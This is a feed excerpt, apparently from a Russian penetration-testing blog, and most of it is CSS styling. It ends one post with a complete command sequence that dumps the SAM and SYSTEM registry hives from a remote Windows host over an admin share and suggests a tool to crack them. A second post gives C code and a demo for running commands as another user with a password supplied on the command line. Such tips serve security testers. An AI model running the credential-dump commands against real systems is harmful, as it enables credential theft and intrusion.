  margin-bottom:-3px;
}
#body:hover .cursor {
    -webkit-animation-name: blink;
    -webkit-animation-duration: 1.5s;
    -webkit-animation-iteration-count: infinite;
    -moz-animation-name: blink;
    -moz-animation-duration: 1.5s;
    -moz-animation-iteration-count: infinite;
}
  
#body p::-webkit-selection  {
    background:#0b209e;
}
#body p::selection { background:#0b209e; }
#body p::-moz-selection { background:#0b209e; }

#body p {
  margin-top:5px;
  margin-bottom:5px;
  font-size:13px;
}

#content{
    float: left; 
    margin-top: 1px;
}
#foot{
    height: 23px;
    width: 100%;
    float: left;
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #cbcbcb),color-stop(0, #a7a7a7));
    border-top:1px solid #515151;
    border-radius:0 0 5px 5px;
}
#foot .handle{
    width: 11px;
    height: 11px;
    float: right;
    margin: 6px;
    overflow: hidden;
}
.handle .grip{
    -webkit-transform: rotate(45deg) scaley(3);
    margin: 2px 0 0 2px;
    color: #646464;
    text-shadow: 1px 1px 0 #c6c6c6;
    font-size: 14px;
}

.icon{
    width: 86px; 
    height: 100px;
    margin: 20px; 
    float: left;
    font-family: "Myriad Pro", sans-serif; 
    text-align: center; 
    font-size: 12px;
}
.icon .frame{
    width: 82px;
    height: 82px; 
    border-radius: 5px;
    border: 2px solid transparent; 
}
.icon .name{
    color: #000;
    padding-top: 3px; 
    border-radius:15px;
    width: 55px;
    margin: 5px 0 0 15px;
}
.icon .folder{
    margin:15px 0 0 6px;
}
&lt;/style&gt;&lt;br /&gt;
&lt;div id="window"&gt;&lt;div id="toolbar"&gt;&lt;div class="top"&gt;&lt;div id="lights"&gt;&lt;div class="light red"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light yellow"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light green"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="title"&gt;&lt;div class="folder"&gt;&lt;div class="tab"&gt;&lt;/div&gt;&lt;div class="body"&gt;&lt;/div&gt;&lt;/div&gt;C:\Windows\System32&amp;gt;&lt;/div&gt;&lt;div id="bubble"&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="body"&gt;&lt;p&gt;net use \\RHOST\c$ /u:admin password&lt;br /&gt;
sc \\RHOST config RemoteRegistry start= demand&lt;br /&gt;
sc \\RHOST start RemoteRegistry&lt;br /&gt;
reg save \\RHOST\hklm\sam sam&lt;br /&gt;
reg save \\RHOST\hklm\system system&lt;br /&gt;
move \\RHOST\C$\Windows\System32\sam sam&lt;br /&gt;
move \\RHOST\C$\Windows\System32\system system&lt;br /&gt;
sc \\RHOST stop RemoteRegistry&lt;br /&gt;
sc \\RHOST config RemoteRegistry start= disabled&lt;br /&gt;
net use \\RHOST\c$ /del&lt;/p&gt;&lt;div class="cursor"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;После чего соответствующие файлы передаются понимающим их гуям [&lt;a href="http://www.insidepro.com/eng/saminside.shtml" target="_blank"&gt;например&lt;/a&gt;].&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvvEwV0520mQPNDwOlsv8Z7uXTMPeMssbzPDTe0fJaSU2_Pcq_I1yBz89kA_XHFlfR2ReP2tYRvxN3LNvJGxACgFHlNkbvnetCFQoYVgMiguF4U41eQG3kR7oHvqFT2HTrrmDwo8QB_F8/s3200/saminside.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvvEwV0520mQPNDwOlsv8Z7uXTMPeMssbzPDTe0fJaSU2_Pcq_I1yBz89kA_XHFlfR2ReP2tYRvxN3LNvJGxACgFHlNkbvnetCFQoYVgMiguF4U41eQG3kR7oHvqFT2HTrrmDwo8QB_F8/s3200/saminside.png" height="271" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvvEwV0520mQPNDwOlsv8Z7uXTMPeMssbzPDTe0fJaSU2_Pcq_I1yBz89kA_XHFlfR2ReP2tYRvxN3LNvJGxACgFHlNkbvnetCFQoYVgMiguF4U41eQG3kR7oHvqFT2HTrrmDwo8QB_F8/s72-c/saminside.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>[hacking tricks] Including password in runas command line</title><link>http://devteev.blogspot.com/2014/03/hacking-tricks-including-password-in_24.html</link><category>Microsoft</category><category>runas</category><category>tools</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Mon, 24 Mar 2014 03:36:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-894901432120756683</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Все пентестеры (и не только) эпизодически натыкаются на проблему, связанную с запуском локального процесса от имени другого пользователя из командной строки. К сожалению, поставляемая с виндой тулень &amp;nbsp;&lt;a href="http://technet.microsoft.com/ru-ru/library/cc771525(v=ws.10).aspx" target="_blank"&gt;runas&lt;/a&gt; не спасает т.к. в ней отсутствует возможность передачи пароля в качестве аргумента. Такой способ:&lt;/div&gt;&lt;style&gt;
/* http://cssdeck.com/labs/pure-css-osx-terminal */
body { background:#d2dfe6;
color: #444;
font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
line-height: 1.5em;
}

/* FINDER WINDOW */

#window{
    width: 90%;
    margin-top:40px;
 margin-left: auto;
 margin-right: auto;
    margin-bottom:40px;
    min-width: 500px; 
    background: #fff;
    border-radius: 5px;
    -webkit-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
    -moz-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
    /*-webkit-transition:all 0.5s; */
    overflow: hidden; 
}

/* TOP BAR */
#topbar{
    width: 100%;
    height: 21px;
    font-size: 16px;
    font-family: "Myriad Pro", sans-serif;
    text-shadow:0px 1px 0px rgba(255,255,255,0.25);
    -webkit-box-shadow:0 1px 0 rgba(0,0,0,0.5); 
    -moz-box-shadow:0 1px 0 rgba(0,0,0,0.5); 
   
    
}
#topbar ul li {
    float: left; 
    padding:0 10px;
    height: 21px;
    line-height: 24px;
}
#topbar ul li:first-child{
    font-size: 20px;
    line-height: 26px;
    margin-left: 5px;
}
#topbar ul li:nth-child(2){
    font-family: "Myriad-Semi", sans-serif;
}
#topbar ul li:active{
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #4a82ff),color-stop(0, #0052fc));
    color: #fff;
    text-shadow: none;
}
#toolbar{
    width: 100%; 
    height: 25px;
    background: grey;
    border-radius:5px 5px 0 0;

    background: #cfcfcf; /* Old browsers */
    background: -moz-linear-gradient(top,  #cfcfcf 0%, #a8a8a8 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#cfcfcf), color-stop(100%,#a8a8a8)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* IE10+ */
    background: linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* W3C */
    
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
    box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;        
    
}
#toolbar .top{
    float: left; 
    width: 100%; 
    height: 23px;
}
#toolbar .bottom{
    float: left; 
    width: 100%; 
    height: 30px;
}

/*-----TRAFFIC LIGHTS-----*/
#toolbar #lights{
    float: left;
    position:relative;
    top:4px;
    left:7px; 
}
.light{
    float:left;
    width:14px;
    height:14px;
    border-radius:14px;
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    overflow: hidden;
}
#lights:hover .glyph{
    opacity: 1;
    cursor:default;
    
}
.light .shine{
     width: 4px;
     height:3px;
     border-radius:10px;
     /*background-image: -webkit-gradient(radial, center center, 0, center center, 3, from(rgba(255,255,255,1)), to(rgba(255,255,255,0)));*/
     background: -moz-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%, rgba(255,255,255,0) 100%); /* FF3.6+ */    
     background-image: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,rgba(255,255,255,1)), color-stop(100%,rgba(255,255,255,0))); /* Chrome,Safari4+ */
     background: -webkit-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* Chrome10+,Safari5.1+ */
     background: -o-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* Opera 12+ */
     background: -ms-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* IE10+ */
     background: radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* W3C */
     
}
.light .glow{
    width:14px;
    height:8px; 
    background-image: -webkit-gradient(radial, center bottom, 0, center center, 5, from(rgba(255,255,255,0.75)), to(rgba(255,255,255,0)));
    background: 0px 0px -moz-radial-gradient(bottom, cover,  rgba(255,255,255,0.70) 0%, rgba(255,255,255,0) 80%); /* FF3.6+ */
   
}
/*--RED--*/
.red{
   background: #f41b16; /* Old browsers */
   background: -moz-linear-gradient(top,  #f41b16 0%, #fc7471 100%); /* FF3.6+ */
   background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f41b16), color-stop(100%,#fc7471)); /* Chrome,Safari4+ */
   background: -webkit-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* Chrome10+,Safari5.1+ */
   background: -o-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* Opera 11.10+ */
   background: -ms-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* IE10+ */
   background: linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* W3C */   
}
.red:active{
     
    background: #972f2e; /* Old browsers */
    background: -moz-linear-gradient(top,  #972f2e 0%, #fc7471 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#972f2e), color-stop(100%,#fc7471)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* IE10+ */
    background: linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* W3C */    
}
.red .shine{    
    position: relative;
    top: -23px;
    left: 5px;  
}
.red .glow{
    position: relative;
    top: -22px;
}
.red .glyph{
    position: relative;
    top: -6px;
    left: 3px;
    font-size: 14px;
    font-weight: bold;
    color: #9b3a36;
    z-index: 50;
    opacity: 0;
}
/*--YELLOW--*/
.yellow{
    background: #f4a316; /* Old browsers */
    background: -moz-linear-gradient(left,  #f4a316 0%, #fcc371 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, right top, color-stop(0%,#f4a316), color-stop(100%,#fcc371)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* IE10+ */
    background: linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* W3C */  
    margin:0px 7px;
}
.yellow:active{
    background: #ae4f1e; /* Old browsers */
    background: -moz-linear-gradient(top,  #ae4f1e 0%, #fcc371 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ae4f1e), color-stop(100%,#fcc371)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* IE10+ */
    background: linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* W3C */    
}
.yellow .shine{ 
    position: relative;
    top: -23px;
    left: 5px;  
}
.yellow .glow{
    position: relative;
    top: -22px;
}


.yellow .glyph{
    position: relative;
    top: -7px;
    left: 4px;
    font-size: 24px;
    color: #854322;
    z-index: 50;
    opacity: 0;
    -webkit-transform: scaleY(1.5) scaleX(1.3);
}

/*--GREEN--*/
.green{
    
    background: #4cae2e; /* Old browsers */
    background: -moz-linear-gradient(top,  #4cae2e 0%, #dafc71 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#4cae2e), color-stop(100%,#dafc71)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* IE10+ */
    background: linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* W3C */
    
}
.green:active{
  background: #48752b; /* Old browsers */
  background: -moz-linear-gradient(top,  #48752b 0%, #dafc71 100%); /* FF3.6+ */
  background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#48752b), color-stop(100%,#dafc71)); /* Chrome,Safari4+ */
  background: -webkit-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* Chrome10+,Safari5.1+ */
  background: -o-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* Opera 11.10+ */
  background: -ms-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* IE10+ */
  background: linear-gradient(top,  #48752b 0%,#dafc71 100%); /* W3C */
  
}
.green .shine{  
    position: relative;
    top: -22px;
    left: 5px; 
}
.green .glow{
    position: relative;
    top: -22px;
}
.green .glyph{
    position: relative;
    top: -6px;
    left: 3px;
    font-size: 14px;
    font-weight: bold;
    color: #25571d;
    z-index: 50;
    opacity: 0;
}

/* Horrible to do this for firefox */
@-moz-document url-prefix() {
  
  .red .glyph {
      position: relative;
      top: -4px;
  }  
  .yellow .glyph {
      top: -4px;
      left: 3px;
  }
    
  .green .glyph{
      position: relative;
      top: -4px;
  }
  
}

/*-----TITLE-----*/
#title{
    float: left; 
    position: relative;
    top:4px;
    width:40%;
    left: 30%;
    font-family: "Myriad Pro", sans-serif; 
    font-size: 14px; 
    text-shadow: 0px 1px 0px rgba(255,255,255,0.5);
    line-height: 14px; 
}
.folder{
    float: left;
    margin-right:5px;
}
.folder .tab{
    width:4px;
    height:2px;
    background:#a4c5da;
    border:1px solid #728ea3;
    border-bottom: none;
    border-radius:2px 2px 0px 0px;
    -webkit-box-shadow:0px -1px 0px #99b5c7 inset;
    margin-left: 1px;
    z-index: 5000;
    margin-bottom: -1px; 
}
.folder .body{
    width: 14px;
    height: 10px;
    border:1px solid #6e8ba1;
    
    background: #b8cfe0; /* Old browsers */
    background: -moz-linear-gradient(top,  #b8cfe0 0%, #86adc8 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#b8cfe0), color-stop(100%,#86adc8)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* IE10+ */
    background: linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* W3C */    
    
    z-index: -50;
    
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.25) inset,0px 1px 0px rgba(0,0,0,0.2);
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.25) inset,0px 1px 0px rgba(0,0,0,0.2);
}


#nav{
    margin: 1px 8px;
    float: left;
}
#view{
    margin: 2px 0 0 110px;
    display: inline-block;
}

.control_box{
    height:20px;
    border-radius: 3px;
    border: 1px solid #555;
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #fefefe),color-stop(0, #b8b8b8));
    box-shadow:0px 1px 0px rgba(255,255,255,0.25);
}
.control_box .control{
    height:20px;
    border-right: 1px solid #2e2e2e;
    float: left;
    text-align: center; 
    width: 27px; 
}
.control:last-child{
    border-right: 0px solid !important;
}
.control:active{ 
    background: #b0afb0; 
    -webkit-box-shadow:0px 0px 4px #000 inset;
}
.active{
    background: #707070 !important;
    -webkit-box-shadow:0px 3px 4px rgba(0,0,0,0.6) inset !important;
}


#body {
    font-family: Andale Mono, monospace;  line-height: 1em;
    font-size:13px;
    float: left;
    width: 100%;
    min-height:130px;
    background:#000;
    padding:10px;
    line-height:1.5em;
}
#body p { 
   color: #63de00!important; 
}

@keyframes blink
{
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}

@-webkit-keyframes blink {
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}
@-moz-keyframes blink {
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}
.cursor {
  background:#63de00; 
  display:inline-block;
  width:11px;
  height:19px;
  margin-bottom:-3px;
}
#body:hover .cursor {
    -webkit-animation-name: blink;
    -webkit-animation-duration: 1.5s;
    -webkit-animation-iteration-count: infinite;
    -moz-animation-name: blink;
    -moz-animation-duration: 1.5s;
    -moz-animation-iteration-count: infinite;
}
  
#body p::-webkit-selection  {
    background:#0b209e;
}
#body p::selection { background:#0b209e; }
#body p::-moz-selection { background:#0b209e; }

#body p {
  margin-top:5px;
  margin-bottom:5px;
  font-size:13px;
}

#content{
    float: left; 
    margin-top: 1px;
}
#foot{
    height: 23px;
    width: 100%;
    float: left;
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #cbcbcb),color-stop(0, #a7a7a7));
    border-top:1px solid #515151;
    border-radius:0 0 5px 5px;
}
#foot .handle{
    width: 11px;
    height: 11px;
    float: right;
    margin: 6px;
    overflow: hidden;
}
.handle .grip{
    -webkit-transform: rotate(45deg) scaley(3);
    margin: 2px 0 0 2px;
    color: #646464;
    text-shadow: 1px 1px 0 #c6c6c6;
    font-size: 14px;
}

.icon{
    width: 86px; 
    height: 100px;
    margin: 20px; 
    float: left;
    font-family: "Myriad Pro", sans-serif; 
    text-align: center; 
    font-size: 12px;
}
.icon .frame{
    width: 82px;
    height: 82px; 
    border-radius: 5px;
    border: 2px solid transparent; 
}
.icon .name{
    color: #000;
    padding-top: 3px; 
    border-radius:15px;
    width: 55px;
    margin: 5px 0 0 15px;
}
.icon .folder{
    margin:15px 0 0 6px;
}
&lt;/style&gt;&lt;br /&gt;
&lt;div id="window"&gt;&lt;div id="toolbar"&gt;&lt;div class="top"&gt;&lt;div id="lights"&gt;&lt;div class="light red"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light yellow"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light green"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="title"&gt;&lt;div class="folder"&gt;&lt;div class="tab"&gt;&lt;/div&gt;&lt;div class="body"&gt;&lt;/div&gt;&lt;/div&gt;C:\Windows\System32&amp;gt;&lt;/div&gt;&lt;div id="bubble"&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="body"&gt;&lt;p&gt;C:\Windows\System32&amp;gt; echo password | runas /u:user cmd&lt;/p&gt;&lt;div class="cursor"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Увы, работал(ет) только на устаревших системах. Решение: использовать API функцию&amp;nbsp;&lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682431(v=vs.85).aspx" target="_blank"&gt;CreateProcessWithLogonW&lt;/a&gt;. Код ниже, бинарь &lt;a href="https://googledrive.com/host/0Bwv6HYj6-f9tRDlDUGFiSDNhaVk/runas.zip"&gt;тут&lt;/a&gt; (md5:424872148d3e84ed99cedd5bfbb8740c)&lt;/div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;pre style="color: black;"&gt;&lt;html&gt;&lt;body style="background: #ffffff; color: black;"&gt;&lt;pre&gt;&lt;span style="color: #000084;"&gt;#&lt;/span&gt;&lt;span style="color: #000084;"&gt;include &lt;/span&gt;&lt;span style="color: blue;"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color: #3f3fbf;"&gt;windows.h&lt;/span&gt;&lt;span style="color: blue;"&gt;&amp;gt;&lt;/span&gt;
&lt;span style="color: #000084;"&gt;#&lt;/span&gt;&lt;span style="color: #000084;"&gt;include &lt;/span&gt;&lt;span style="color: blue;"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color: #3f3fbf;"&gt;stdio.h&lt;/span&gt;&lt;span style="color: blue;"&gt;&amp;gt;&lt;/span&gt;
&lt;span style="color: #000084;"&gt;#&lt;/span&gt;&lt;span style="color: #000084;"&gt;include &lt;/span&gt;&lt;span style="color: blue;"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color: #3f3fbf;"&gt;userenv.h&lt;/span&gt;&lt;span style="color: blue;"&gt;&amp;gt;&lt;/span&gt;

&lt;span style="color: #000084; font-weight: bold;"&gt;void&lt;/span&gt; wmain(&lt;span style="color: #000084; font-weight: bold;"&gt;int&lt;/span&gt; argc, &lt;span style="color: #000084; font-weight: bold;"&gt;WCHAR&lt;/span&gt; *argv[])
{
    &lt;span style="color: #000084; font-weight: bold;"&gt;PROCESS_INFORMATION&lt;/span&gt; pi = {0};
    &lt;span style="color: #000084; font-weight: bold;"&gt;STARTUPINFO&lt;/span&gt;         si = {0};

    &lt;span style="color: #000084; font-weight: bold;"&gt;ZeroMemory&lt;/span&gt;( &amp;amp;si, &lt;span style="color: #000084; font-weight: bold;"&gt;sizeof&lt;/span&gt;(&lt;span style="color: #000084; font-weight: bold;"&gt;STARTUPINFO&lt;/span&gt;) );
    si.cb = &lt;span style="color: #000084; font-weight: bold;"&gt;sizeof&lt;/span&gt;(&lt;span style="color: #000084; font-weight: bold;"&gt;STARTUPINFO&lt;/span&gt;);
    si.dwFlags |= STARTF_USESHOWWINDOW;
 si.wShowWindow = SW_HIDE;
    si.cb = &lt;span style="color: #000084; font-weight: bold;"&gt;sizeof&lt;/span&gt;(&lt;span style="color: #000084; font-weight: bold;"&gt;STARTUPINFO&lt;/span&gt;);
    
    &lt;span style="color: #000084; font-weight: bold;"&gt;if&lt;/span&gt; (argc &amp;lt; 4)
    {
        &lt;span style="color: #000084; font-weight: bold;"&gt;wprintf&lt;/span&gt;(&lt;span style="color: blue;"&gt;L"&lt;/span&gt;&lt;span style="color: blue;"&gt;Usage: &lt;/span&gt;&lt;span style="color: blue;"&gt;%s&lt;/span&gt;&lt;span style="color: blue;"&gt; [user@domain] [password] [cmd]&lt;/span&gt;&lt;span style="color: blue;"&gt;"&lt;/span&gt;, argv[0]);
        &lt;span style="color: #000084; font-weight: bold;"&gt;wprintf&lt;/span&gt;(&lt;span style="color: blue;"&gt;L"&lt;/span&gt;&lt;span style="color: blue;"&gt;\n&lt;/span&gt;&lt;span style="color: blue;"&gt;Example: &lt;/span&gt;&lt;span style="color: blue;"&gt;%s&lt;/span&gt;&lt;span style="color: blue;"&gt; adm@my.domain pass &lt;/span&gt;&lt;span style="color: blue;"&gt;\"&lt;/span&gt;&lt;span style="color: blue;"&gt;cmd /c ipconfig &amp;gt;C:&lt;/span&gt;&lt;span style="color: blue;"&gt;\\&lt;/span&gt;&lt;span style="color: blue;"&gt;\\&lt;/span&gt;&lt;span style="color: blue;"&gt;tempdir&lt;/span&gt;&lt;span style="color: blue;"&gt;\\&lt;/span&gt;&lt;span style="color: blue;"&gt;\\&lt;/span&gt;&lt;span style="color: blue;"&gt;output.txt&lt;/span&gt;&lt;span style="color: blue;"&gt;\"&lt;/span&gt;&lt;span style="color: blue;"&gt;"&lt;/span&gt;, argv[0]);
        &lt;span style="color: #000084; font-weight: bold;"&gt;return&lt;/span&gt;;
 }
        &lt;span style="color: #000084; font-weight: bold;"&gt;wprintf&lt;/span&gt;(&lt;span style="color: blue;"&gt;L"&lt;/span&gt;&lt;span style="color: blue;"&gt;Executed: &lt;/span&gt;&lt;span style="color: blue;"&gt;%s&lt;/span&gt;&lt;span style="color: blue;"&gt;"&lt;/span&gt;, argv[3]);
  &lt;span style="color: #000084; font-weight: bold;"&gt;wprintf&lt;/span&gt;(&lt;span style="color: blue;"&gt;L"&lt;/span&gt;&lt;span style="color: blue;"&gt;\n&lt;/span&gt;&lt;span style="color: blue;"&gt;\n&lt;/span&gt;&lt;span style="color: blue;"&gt;"&lt;/span&gt;);
    &lt;span style="color: #000084; font-weight: bold;"&gt;if&lt;/span&gt; (!CreateProcessWithLogonW(argv[1], &lt;span style="color: #000084; font-weight: bold;"&gt;NULL&lt;/span&gt;, argv[2], 
  LOGON_WITH_PROFILE, &lt;span style="color: #000084; font-weight: bold;"&gt;NULL&lt;/span&gt;, argv[3], 
        CREATE_UNICODE_ENVIRONMENT, &lt;span style="color: #000084; font-weight: bold;"&gt;NULL&lt;/span&gt;, &lt;span style="color: #000084; font-weight: bold;"&gt;NULL&lt;/span&gt;, 
            &amp;amp;si, &amp;amp;pi)) &lt;span style="color: #000084; font-weight: bold;"&gt;wprintf&lt;/span&gt;(&lt;span style="color: blue;"&gt;L"&lt;/span&gt;&lt;span style="color: blue;"&gt;error&lt;/span&gt;&lt;span style="color: blue;"&gt;"&lt;/span&gt;);

    &lt;span style="color: #000084; font-weight: bold;"&gt;CloseHandle&lt;/span&gt;(pi.hProcess);
    &lt;span style="color: #000084; font-weight: bold;"&gt;CloseHandle&lt;/span&gt;(pi.hThread);
}
&lt;/pre&gt;&lt;/body&gt;&lt;/html&gt;&lt;/pre&gt;&lt;div id="window"&gt;&lt;div id="toolbar"&gt;&lt;div class="top"&gt;&lt;div id="lights"&gt;&lt;div class="light red"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light yellow"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light green"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="title"&gt;&lt;div class="folder"&gt;&lt;div class="tab"&gt;&lt;/div&gt;&lt;div class="body"&gt;&lt;/div&gt;&lt;/div&gt;C:\Temp&amp;gt;&lt;/div&gt;&lt;div id="bubble"&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="body"&gt;&lt;p&gt;C:\Temp&amp;gt;runas.exe&lt;br /&gt;
Usage: runas.exe [user@domain] [password] [cmd]&lt;br /&gt;
Example: runas.exe adm@my.domain pass "cmd /c ipconfig &amp;gt;C:\\tempdir\\output.txt"&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;whoami&lt;br /&gt;
test\admin&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;runas.exe abc@test.local abc "cmd /c whoami &amp;gt;C:\\Temp\\t.txt"&lt;br /&gt;
Executed: cmd /c whoami &amp;gt;C:\\Temp\\t.txt&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;type t.txt&lt;br /&gt;
test\abc&lt;br /&gt;
&lt;br /&gt;
